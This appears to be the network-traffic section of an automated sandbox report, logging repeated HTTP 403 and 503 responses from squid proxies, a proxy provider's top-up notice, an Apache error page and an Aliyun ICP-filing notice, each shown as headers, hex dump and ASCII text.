Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=a28a73df-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:53 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:53 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:54 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:54 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { 